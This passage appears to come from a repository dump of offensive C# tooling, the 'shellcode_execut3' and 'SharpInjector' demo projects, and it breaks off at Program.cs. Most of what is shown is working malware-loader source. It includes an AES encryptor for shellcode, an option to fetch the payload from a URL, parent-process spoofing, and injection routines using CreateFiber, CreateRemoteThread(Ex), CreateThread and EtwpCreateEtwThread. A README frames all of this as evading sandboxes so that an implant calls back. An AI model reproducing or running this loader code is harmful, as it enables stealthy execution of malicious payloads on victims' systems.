    "content": "using System.Reflection;\r\nusing System.Runtime.CompilerServices;\r\nusing System.Runtime.InteropServices;\r\n\r\n// General information about an assembly is controlled through the following\r\n// set of attributes. Change these attribute values to modify the information\r\n// associated with an assembly.\r\n[assembly: AssemblyTitle(\"shellcode_execut3\")]\r\n[assembly: AssemblyDescription(\"\")]\r\n[assembly: AssemblyConfiguration(\"\")]\r\n[assembly: AssemblyCompany(\"\")]\r\n[assembly: AssemblyProduct(\"shellcode_execut3\")]\r\n[assembly: AssemblyCopyright(\"Copyright ©  2022\")]\r\n[assembly: AssemblyTrademark(\"\")]\r\n[assembly: AssemblyCulture(\"\")]\r\n\r\n// Setting ComVisible to false makes the types in this assembly not visible\r\n// to COM components. If you need to access a type in this assembly from\r\n// COM, set the ComVisible attribute to true on that type.\r\n[assembly: ComVisible(false)]\r\n\r\n// The following GUID is for the ID of the typelib if this project is exposed to COM\r\n[assembly: Guid(\"adef6000-a190-4737-9a02-b236d56c86ac\")]\r\n\r\n// Version information for an assembly consists of the following four values:\r\n//\r\n//      Major Version\r\n//      Minor Version\r\n//      Build Number\r\n//      Revision\r\n//\r\n// You can specify all the values or you can default the Build and Revision Numbers\r\n// by using the '*' as shown below:\r\n// [assembly: AssemblyVersion(\"1.0.*\")]\r\n[assembly: AssemblyVersion(\"1.0.0.0\")]\r\n[assembly: AssemblyFileVersion(\"1.0.0.0\")]\r\n"
  },
  {
    "path": "demo2/shellcode_execut3/shellcode_execut3/shellcode_execut3.csproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <Import Project=\"$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props\" Condition=\"Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')\" />\r\n  <PropertyGroup>\r\n    <Configuration Condition=\" '$(Configuration)' == '' \">Debug</Configuration>\r\n    <Platform Condition=\" '$(Platform)' == '' \">AnyCPU</Platform>\r\n    <ProjectGuid>{ADEF6000-A190-4737-9A02-B236D56C86AC}</ProjectGuid>\r\n    <OutputType>Exe</OutputType>\r\n    <RootNamespace>shellcode_execut3</RootNamespace>\r\n    <AssemblyName>shellcode_execut3</AssemblyName>\r\n    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>\r\n    <FileAlignment>512</FileAlignment>\r\n    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>\r\n    <Deterministic>true</Deterministic>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' \">\r\n    <PlatformTarget>AnyCPU</PlatformTarget>\r\n    <DebugSymbols>true</DebugSymbols>\r\n    <DebugType>full</DebugType>\r\n    <Optimize>false</Optimize>\r\n    <OutputPath>bin\\Debug\\</OutputPath>\r\n    <DefineConstants>DEBUG;TRACE</DefineConstants>\r\n    <ErrorReport>prompt</ErrorReport>\r\n    <WarningLevel>4</WarningLevel>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' \">\r\n    <PlatformTarget>AnyCPU</PlatformTarget>\r\n    <DebugType>pdbonly</DebugType>\r\n    <Optimize>true</Optimize>\r\n    <OutputPath>bin\\Release\\</OutputPath>\r\n    <DefineConstants>TRACE</DefineConstants>\r\n    <ErrorReport>prompt</ErrorReport>\r\n    <WarningLevel>4</WarningLevel>\r\n  </PropertyGroup>\r\n  <ItemGroup>\r\n    <Reference Include=\"System\" />\r\n    <Reference Include=\"System.Core\" />\r\n    <Reference Include=\"System.Xml.Linq\" />\r\n    
<Reference Include=\"System.Data.DataSetExtensions\" />\r\n    <Reference Include=\"Microsoft.CSharp\" />\r\n    <Reference Include=\"System.Data\" />\r\n    <Reference Include=\"System.Net.Http\" />\r\n    <Reference Include=\"System.Xml\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Compile Include=\"Program.cs\" />\r\n    <Compile Include=\"Properties\\AssemblyInfo.cs\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <None Include=\"App.config\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(MSBuildToolsPath)\\Microsoft.CSharp.targets\" />\r\n</Project>"
  },
  {
    "path": "demo2/shellcode_execut3/shellcode_execut3.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.32519.379\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}\") = \"shellcode_execut3\", \"shellcode_execut3\\shellcode_execut3.csproj\", \"{ADEF6000-A190-4737-9A02-B236D56C86AC}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|Any CPU = Debug|Any CPU\r\n\t\tRelease|Any CPU = Release|Any CPU\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{ADEF6000-A190-4737-9A02-B236D56C86AC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU\r\n\t\t{ADEF6000-A190-4737-9A02-B236D56C86AC}.Debug|Any CPU.Build.0 = Debug|Any CPU\r\n\t\t{ADEF6000-A190-4737-9A02-B236D56C86AC}.Release|Any CPU.ActiveCfg = Release|Any CPU\r\n\t\t{ADEF6000-A190-4737-9A02-B236D56C86AC}.Release|Any CPU.Build.0 = Release|Any CPU\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {3CAC8601-1FD3-4480-A6AB-9E809AD7890B}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "demo3/README.md",
    "content": "Uses static string encryption, XOR encryption, sandbox evasion and EtwpCreateEtwThread to run the shellcode and get the implant to call back.\r\n\r\nBuilt on SharpInjector, with shellcode obfuscation added."
  },
  {
    "path": "demo3/SharpInjector-master/.gitignore",
    "content": "*/Debug/*\n*/Release/*\n*/x64/*\n*/bin/*\n*/obj/*\n.vs/*\n*.user\n"
  },
  {
    "path": "demo3/SharpInjector-master/README.md",
    "content": "# SharpInjector\nProject now has a 2nd branch, DInvoke, that implements Reprobate for D/Invoke functionality - 1/15/2022\n\n## Objectives\n* Utilize encrypted shellcode\n* Option to include the shellcode within the executable or download shellcode from URL\n* Ability to quickly switch which Windows API call is used for execution\n* Ability to spawn a specified process (default: iexplore.exe) for shellcode to be injected into (for remote injection methods)\n* Ability to spoof the parent process (default: explorer.exe) of target process that will be injected into (for remote injection methods)\n\n## Overview\nThis solution has two projects: ScEncryptor and SharpInjector. The ScEncryptor project will allow you to encrypt a `.bin` file containing your shellcode. The SharpInjector project will be compiled with the resulting encrypted shellcode and inject it into memory. The shellcode the project comes with simply opens calc.\n\n## Usage\n1. Set the encryption key in ScEncryptor\\Program.cs (the key must be 16/24/32 bytes)\n2. Build the ScEncryptor project\n3. Use the resulting executable to encrypt your shellcode: `ScEncryptor.exe C:\\Temp\\shellcode.bin` (The encrypted shellcode will be automatically inserted in SharpInjector\\Shellycode.cs)\n4. Optional: set `EncSc = \"\"` within SharpInjector\\Shellycode.cs and instead host the shellcode string on the web. Set the `ShellcodeUrl` variable in SharpInjector\\Program.cs to the URL of the `EncSc` string\n5. Set the decryption key in SharpInjector\\Program.cs\n6. Set the `exeMethod`, `ParentName`, and `ProgramPath` variables in SharpInjector\\Program.cs to desired values\n7. Build the SharpInjector project (set to x64 before building)\n\n## Execution Methods\nCurrent options for shellcode execution include the following Windows API calls:\n* CreateFiber\n* CreateRemoteThread\n* CreateRemoteThreadEx\n* CreateThread\n* EtwpCreateEtwThread\n* QueueUserAPC\n* RtlCreateUserThread\n"
  },
  {
    "path": "demo3/SharpInjector-master/ScEncryptor/App.config",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<configuration>\n    <startup> \n        <supportedRuntime version=\"v4.0\" sku=\".NETFramework,Version=v4.7.2\" />\n    </startup>\n</configuration>"
  },
  {
    "path": "demo3/SharpInjector-master/ScEncryptor/Program.cs",
    "content": "﻿using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\nusing System.IO;\nusing System.Security.Cryptography;\n\nnamespace ScEncryptor\n{\n    class Program\n    {\n        static void Main(string[] args)\n        {\n            if (args.Length != 1)\n            {\n                Console.WriteLine(\"Usage: EncryptedShellcode.exe <path to shellcode.bin>\");\n                Environment.Exit(1);\n            }\n\n            string PayloadPath = args[0];\n            byte[] Shellcode = File.ReadAllBytes(PayloadPath);\n            string B64Shellcode = Convert.ToBase64String(Shellcode);\n            string EncryptedShellcode = Enc(B64Shellcode);\n            WriteShellcodeToFile(EncryptedShellcode);\n            Console.WriteLine(\"[*] Shellcode encrypted within Shellycode.cs!\");\n            Console.WriteLine(\"[*] Now build the injector project or remove encrypted shellcode and host it on the web\");\n        }\n\n        public static string Enc(string data)\n        {\n            string enc = \"\";\n            string key = \"01010101010101010101010101010101\"; // CHANGE THIS TO A 16/24/32 BYTE VALUE\n\n            // Check byte key length; exit if not 16, 24, or 32\n            if (!(new[] {16,24,32}.Contains(Buffer.ByteLength(Encoding.UTF8.GetBytes(key)))))\n            {\n                Console.WriteLine(\"[!] 
Encryption key must be 16, 24, or 32 bytes long\");\n                Environment.Exit(1);\n            }\n\n            byte[] iv = new byte[16];\n\n            using (Aes aes = Aes.Create())\n            {\n                aes.Key = Encoding.UTF8.GetBytes(key);\n                aes.IV = iv;\n\n                ICryptoTransform encryptor = aes.CreateEncryptor(aes.Key, aes.IV);\n\n                using (MemoryStream ms = new MemoryStream())\n                {\n                    using (CryptoStream cs = new CryptoStream((Stream)ms, encryptor, CryptoStreamMode.Write))\n                    {\n                        using (StreamWriter sw = new StreamWriter((Stream)cs))\n                        {\n                            sw.Write(data);\n                        }\n\n                        byte[] arr = ms.ToArray();\n                        enc = Convert.ToBase64String(arr);\n                    }\n                }\n            }\n\n            return enc;\n        }\n\n        public static void WriteShellcodeToFile(string EncryptedShellcode)\n        {\n            string WorkingDir = Environment.CurrentDirectory;\n            string ProjectDir = Directory.GetParent(WorkingDir).Parent.FullName;\n\n            string[] lines = {\n                \"namespace SharpInjector\",\n                \"{\",\n                \"\\tclass EncryptedShellcode\",\n                \"\\t{\",\n                $\"\\t\\tpublic string EncSc = \\\"{EncryptedShellcode}\\\";\",\n                \"\\t}\",\n                \"}\"\n            };\n\n            File.WriteAllLines($\"{ProjectDir}\\\\..\\\\SharpInjector\\\\Shellycode.cs\", lines);\n\n        }\n\n    }\n}\n"
  },
  {
    "path": "demo3/SharpInjector-master/ScEncryptor/Properties/AssemblyInfo.cs",
    "content": "﻿using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Information about an assembly is controlled through the following\n// set of attributes. Change these attribute values to modify the information\n// associated with an assembly.\n[assembly: AssemblyTitle(\"ScEncryptor\")]\n[assembly: AssemblyDescription(\"\")]\n[assembly: AssemblyConfiguration(\"\")]\n[assembly: AssemblyCompany(\"\")]\n[assembly: AssemblyProduct(\"ScEncryptor\")]\n[assembly: AssemblyCopyright(\"Copyright ©  2020\")]\n[assembly: AssemblyTrademark(\"\")]\n[assembly: AssemblyCulture(\"\")]\n\n// Setting ComVisible to false makes the types in this assembly not visible\n// to COM components.  If you need to access a type in this assembly from\n// COM, set the ComVisible attribute to true on that type.\n[assembly: ComVisible(false)]\n\n// The following GUID is for the ID of the typelib if this project is exposed to COM\n[assembly: Guid(\"27780a45-fc10-4e68-a461-fcceaf2d1bd6\")]\n\n// Version information for an assembly consists of the following four values:\n//\n//      Major Version\n//      Minor Version\n//      Build Number\n//      Revision\n//\n// You can specify all the values or you can default the Build and Revision Numbers\n// by using the '*' as shown below:\n// [assembly: AssemblyVersion(\"1.0.*\")]\n[assembly: AssemblyVersion(\"1.0.0.0\")]\n[assembly: AssemblyFileVersion(\"1.0.0.0\")]\n"
  },
  {
    "path": "demo3/SharpInjector-master/ScEncryptor/ScEncryptor.csproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <Import Project=\"$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props\" Condition=\"Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')\" />\n  <PropertyGroup>\n    <Configuration Condition=\" '$(Configuration)' == '' \">Debug</Configuration>\n    <Platform Condition=\" '$(Platform)' == '' \">AnyCPU</Platform>\n    <ProjectGuid>{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}</ProjectGuid>\n    <OutputType>Exe</OutputType>\n    <RootNamespace>ScEncryptor</RootNamespace>\n    <AssemblyName>ScEncryptor</AssemblyName>\n    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>\n    <FileAlignment>512</FileAlignment>\n    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>\n    <Deterministic>true</Deterministic>\n  </PropertyGroup>\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' \">\n    <PlatformTarget>AnyCPU</PlatformTarget>\n    <DebugSymbols>true</DebugSymbols>\n    <DebugType>full</DebugType>\n    <Optimize>false</Optimize>\n    <OutputPath>bin\\Debug\\</OutputPath>\n    <DefineConstants>DEBUG;TRACE</DefineConstants>\n    <ErrorReport>prompt</ErrorReport>\n    <WarningLevel>4</WarningLevel>\n  </PropertyGroup>\n  <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' \">\n    <PlatformTarget>AnyCPU</PlatformTarget>\n    <DebugType>pdbonly</DebugType>\n    <Optimize>true</Optimize>\n    <OutputPath>bin\\Release\\</OutputPath>\n    <DefineConstants>TRACE</DefineConstants>\n    <ErrorReport>prompt</ErrorReport>\n    <WarningLevel>4</WarningLevel>\n  </PropertyGroup>\n  <ItemGroup>\n    <Reference Include=\"System\" />\n    <Reference Include=\"System.Core\" />\n    <Reference Include=\"System.Windows.Forms\" />\n    <Reference Include=\"System.Xml.Linq\" />\n    <Reference 
Include=\"System.Data.DataSetExtensions\" />\n    <Reference Include=\"Microsoft.CSharp\" />\n    <Reference Include=\"System.Data\" />\n    <Reference Include=\"System.Net.Http\" />\n    <Reference Include=\"System.Xml\" />\n  </ItemGroup>\n  <ItemGroup>\n    <Compile Include=\"Program.cs\" />\n    <Compile Include=\"Properties\\AssemblyInfo.cs\" />\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"App.config\" />\n  </ItemGroup>\n  <Import Project=\"$(MSBuildToolsPath)\\Microsoft.CSharp.targets\" />\n  <PropertyGroup>\n    <PostBuildEvent>\n    </PostBuildEvent>\n  </PropertyGroup>\n</Project>\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/App.config",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<configuration>\n    <startup> \n        <supportedRuntime version=\"v4.0\" sku=\".NETFramework,Version=v4.7.2\" />\n    </startup>\n</configuration>"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/CreateFiber.cs",
    "content": "using System;\nusing System.IO;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Diagnostics;\nusing System.Windows.Forms;\nusing System.Runtime.InteropServices;\nusing System.Security.Cryptography;\n\nnamespace SharpInjector\n{\n    class CreateFiber\n    {\n        public static void ExecuteCreateFiber(byte[] Shellcode)\n        {\n            //1. Convert the main thread into a fiber with the ConvertThreadToFiber function\n            IntPtr fiberAddr = WinAPI.ConvertThreadToFiber(IntPtr.Zero);\n\n            Console.WriteLine(\"[*] Allocating shellcode in current process...\");\n            //2. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write\n            IntPtr address = WinAPI.VirtualAlloc(IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n\n            //3.Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space\n            IntPtr ShellCode_Pointer = Marshal.AllocHGlobal(Shellcode.Length);\n            Marshal.Copy(Shellcode, 0, ShellCode_Pointer, Shellcode.Length);\n            WinAPI.RtlCopyMemory(address, ShellCode_Pointer, Shellcode.Length);\n\n            //4.Change the memory page permissions to Execute/ Read with VirtualProtect\n            WinAPI.VirtualProtect(address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect);\n\n            Console.WriteLine(\"[*] Calling CreateFiber...\");\n            //5.Call CreateFiber on shellcode address\n            IntPtr fiber = WinAPI.CreateFiber(0, address, IntPtr.Zero);\n            if (fiber == IntPtr.Zero)\n            {\n                //clean\n                Marshal.FreeHGlobal(ShellCode_Pointer);\n                //return\n                return;\n            }\n\n            //6.Call SwitchToFiber to start the fiber and execute the shellcode\n            WinAPI.SwitchToFiber(fiber);\n            //7.Execution only comes back here if the shellcode fiber explicitly switches to the main fiber\n            //  (if the fiber function simply returns, the thread exits). Once we are back on the main\n            //  fiber, SwitchToFiber to the already-current fiber is documented by Microsoft as unsafe,\n            //  so this call is not expected to run in practice; it is kept from the original project.\n            WinAPI.SwitchToFiber(fiberAddr);\n\n            //CLEAN UP AFTERWARDS.\n            Marshal.FreeHGlobal(ShellCode_Pointer);\n        }\n    }\n}\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/CreateRemoteThread.cs",
    "content": "﻿using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\n\nnamespace SharpInjector\n{\n    class CreateRemoteThread\n    {\n        public static void ExecuteCreateRemoteThread(string ParentName, string ProgramPath, byte[] Shellcode)\n        {\n            WinAPI.STARTUPINFOEX StartupInfoEx = new WinAPI.STARTUPINFOEX();\n            IntPtr lpSize = IntPtr.Zero;\n\n            WinAPI.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);\n            StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);\n            WinAPI.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize);\n\n            // Get handle on parent\n            Process ParentProcess = Process.GetProcessesByName(ParentName)[0];\n            Console.WriteLine($\"[*] Found parent process: {ParentProcess.ProcessName} (pid: {ParentProcess.Id})\");\n            IntPtr ParentHandle = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.PROCESS_CREATE_PROCESS | WinAPI.ProcessAccessFlags.PROCESS_DUP_HANDLE, false, ParentProcess.Id);\n\n            IntPtr lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);\n            Marshal.WriteIntPtr(lpValueProc, ParentHandle);\n\n            WinAPI.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)WinAPI.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);\n\n            WinAPI.SECURITY_ATTRIBUTES ps = new WinAPI.SECURITY_ATTRIBUTES();\n            WinAPI.SECURITY_ATTRIBUTES ts = new WinAPI.SECURITY_ATTRIBUTES();\n\n            ps.nLength = Marshal.SizeOf(ps);\n            ts.nLength = Marshal.SizeOf(ts);\n\n            IntPtr bytesWritten = IntPtr.Zero;\n\n\n            WinAPI.PROCESS_INFORMATION ProcessInfo = new WinAPI.PROCESS_INFORMATION();\n\n            bool success = WinAPI.CreateProcess(\n 
               ProgramPath,\n                null,\n                ref ps,\n                ref ts,\n                true,\n                WinAPI.ProcessCreationFlags.CREATE_SUSPENDED | WinAPI.ProcessCreationFlags.CREATE_NO_WINDOW | WinAPI.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT,\n                IntPtr.Zero,\n                null,\n                ref StartupInfoEx,\n                out ProcessInfo);\n\n            if (ProcessInfo.hProcess == IntPtr.Zero)\n            {\n                return;\n            }\n\n            Console.WriteLine($\"[*] Spawned new instance of {ProgramPath} (pid: {ProcessInfo.dwProcessId})\");\n            Process Target = Process.GetProcessById((int)ProcessInfo.dwProcessId);\n\n            Console.WriteLine(\"[*] Allocating shellcode...\");\n            IntPtr Address = WinAPI.VirtualAllocEx(Target.Handle, IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n            if (Address == IntPtr.Zero)\n            {\n                WinAPI.TerminateProcess(ProcessInfo.hProcess, 0);\n                return;\n            }\n\n            if (!WinAPI.WriteProcessMemory(ProcessInfo.hProcess, Address, Shellcode, Shellcode.Length, out bytesWritten))\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                return;\n            }\n\n            if (!WinAPI.VirtualProtectEx(ProcessInfo.hProcess, Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect))\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                return;\n            }\n\n            Console.WriteLine(\"[*] Calling CreateRemoteThread...\");\n            IntPtr hThread = WinAPI.CreateRemoteThread(ProcessInfo.hProcess, IntPtr.Zero, 0, Address, IntPtr.Zero, 0, IntPtr.Zero);\n            if (hThread == IntPtr.Zero)\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                
return;\n            }\n            Console.WriteLine(\"[*] Shellcode executed\");\n        }\n    }\n}\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/CreateRemoteThreadEx.cs",
    "content": "﻿using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\n\nnamespace SharpInjector\n{\n    class CreateRemoteThreadEx\n    {\n        public static void ExecuteCreateRemoteThreadEx(string ParentName, string ProgramPath, byte[] Shellcode)\n        {\n            WinAPI.STARTUPINFOEX StartupInfoEx = new WinAPI.STARTUPINFOEX();\n            IntPtr lpSize = IntPtr.Zero;\n\n            WinAPI.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);\n            StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);\n            WinAPI.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize);\n\n            // Get handle on parent\n            Process ParentProcess = Process.GetProcessesByName(ParentName)[0];\n            Console.WriteLine($\"[*] Found parent process: {ParentProcess.ProcessName} (pid: {ParentProcess.Id})\");\n            IntPtr ParentHandle = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.PROCESS_CREATE_PROCESS | WinAPI.ProcessAccessFlags.PROCESS_DUP_HANDLE, false, ParentProcess.Id);\n\n            IntPtr lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);\n            Marshal.WriteIntPtr(lpValueProc, ParentHandle);\n\n            WinAPI.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)WinAPI.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);\n\n            WinAPI.SECURITY_ATTRIBUTES ps = new WinAPI.SECURITY_ATTRIBUTES();\n            WinAPI.SECURITY_ATTRIBUTES ts = new WinAPI.SECURITY_ATTRIBUTES();\n\n            ps.nLength = Marshal.SizeOf(ps);\n            ts.nLength = Marshal.SizeOf(ts);\n\n            IntPtr bytesWritten = IntPtr.Zero;\n\n\n            WinAPI.PROCESS_INFORMATION ProcessInfo = new WinAPI.PROCESS_INFORMATION();\n\n            bool success = 
WinAPI.CreateProcess(\n                ProgramPath,\n                null,\n                ref ps,\n                ref ts,\n                true,\n                WinAPI.ProcessCreationFlags.CREATE_SUSPENDED | WinAPI.ProcessCreationFlags.CREATE_NO_WINDOW | WinAPI.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT,\n                IntPtr.Zero,\n                null,\n                ref StartupInfoEx,\n                out ProcessInfo);\n\n            if (ProcessInfo.hProcess == IntPtr.Zero)\n            {\n                return;\n            }\n\n            Console.WriteLine($\"[*] Spawned new instance of {ProgramPath} (pid: {ProcessInfo.dwProcessId})\");\n            Process Target = Process.GetProcessById((int)ProcessInfo.dwProcessId);\n\n            Console.WriteLine(\"[*] Allocating shellcode...\");\n            IntPtr Address = WinAPI.VirtualAllocEx(Target.Handle, IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n            if (Address == IntPtr.Zero)\n            {\n                WinAPI.TerminateProcess(ProcessInfo.hProcess, 0);\n                return;\n            }\n\n            if (!WinAPI.WriteProcessMemory(ProcessInfo.hProcess, Address, Shellcode, Shellcode.Length, out bytesWritten))\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                return;\n            }\n\n            if (!WinAPI.VirtualProtectEx(ProcessInfo.hProcess, Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect))\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n                return;\n            }\n\n            Console.WriteLine(\"[*] Calling CreateRemoteThreadEx...\");\n            IntPtr hThread = WinAPI.CreateRemoteThreadEx(ProcessInfo.hProcess, IntPtr.Zero, 0, Address, IntPtr.Zero, 0, IntPtr.Zero, IntPtr.Zero);\n            if (hThread == IntPtr.Zero)\n            {\n                WinAPI.Clean(ProcessInfo.hProcess, Address, 
Shellcode.Length);\n                return;\n            }\n\n            Console.WriteLine(\"[*] Shellcode executed\");\n        }\n    }\n}\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/CreateThread.cs",
    "content": "﻿using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Threading.Tasks;\n\nnamespace SharpInjector\n{\n    class CreateThread\n    {\n        public static void ExecuteCreateThread(byte[] Shellcode)\n        {\n            IntPtr hThread = IntPtr.Zero;\n            UInt32 threadId = 0;\n\n            Console.WriteLine(\"[*] Allocating shellcode in current process...\");\n            IntPtr Address = WinAPI.VirtualAlloc(IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n            if (Address == IntPtr.Zero)\n            {\n                return;\n            }\n\n            Marshal.Copy(Shellcode, 0, Address, Shellcode.Length);\n\n            if (!WinAPI.VirtualProtect(Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect))\n            {\n                WinAPI.VirtualFree(Address, 0, WinAPI.FreeType.MEM_RELEASE);\n                return;\n            }\n\n            Console.WriteLine(\"[*] Calling CreateThread...\");\n            hThread = WinAPI.CreateThread((IntPtr)0, 0, Address, IntPtr.Zero, 0, ref threadId);\n            if (hThread == IntPtr.Zero)\n            {\n                WinAPI.VirtualFree(Address, 0, WinAPI.FreeType.MEM_RELEASE);\n                return;\n            }\n\n            WinAPI.WaitForSingleObject(hThread, 0xFFFFFFFF);\n            Console.WriteLine(\"[*] Shellcode executed\");\n        }\n    }\n}\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/EtwpCreateEtwThread.cs",
    "content": "﻿using System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nusing System.IO;\r\nusing System.Diagnostics;\r\nusing System.Windows.Forms;\r\nusing System.Runtime.InteropServices;\r\nusing System.Security.Cryptography;\r\n\r\nnamespace SharpInjector\r\n{\r\n    class EtwpCreateEtwThread\r\n    {\r\n\r\n\r\n        public static void ExecuteEtwpCreateEtwThread(byte[] Shellcode)\r\n        {\r\n\r\n            Console.WriteLine(\"[*] Allocating shellcode in current process...\");\r\n            IntPtr Address = WinAPI.VirtualAlloc(IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT | WinAPI.MEM_RESERVE, WinAPI.PAGE_READWRITE);\r\n            if (Address == IntPtr.Zero)\r\n            {\r\n                return;\r\n            }\r\n\r\n            IntPtr ShellCode_Pointer = Marshal.AllocHGlobal(Shellcode.Length);\r\n            Marshal.Copy(Shellcode, 0, ShellCode_Pointer, Shellcode.Length);\r\n            WinAPI.RtlCopyMemory(Address, ShellCode_Pointer, Shellcode.Length);\r\n\r\n            WinAPI.VirtualProtect(Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect);\r\n\r\n            Console.WriteLine(\"[*] Calling EtwpCreateEtwThread...\");\r\n            IntPtr location = WinAPI.EtwpCreateEtwThread(Address, IntPtr.Zero);\r\n            WinAPI.WaitForSingleObject(location, 0xFFFFFFFF);\r\n            Console.WriteLine(\"[*] Shellcode executed\");\r\n\r\n        }\r\n\r\n\r\n    }\r\n}\r\n"
  },
  {
    "path": "demo3/SharpInjector-master/SharpInjector/Program.cs",
